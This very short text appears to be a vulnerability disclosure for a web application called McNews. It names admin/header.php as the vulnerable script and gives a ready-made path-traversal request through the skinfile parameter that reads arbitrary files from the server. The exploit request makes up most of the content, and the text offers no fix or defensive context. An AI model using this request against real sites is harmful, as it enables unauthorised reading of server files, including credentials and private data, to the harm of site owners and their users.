The vulnerable script is <mcnews_root>/admin/header.php Exploit it with : header.php?voir=1&skinfile=skin/../../../file/to/view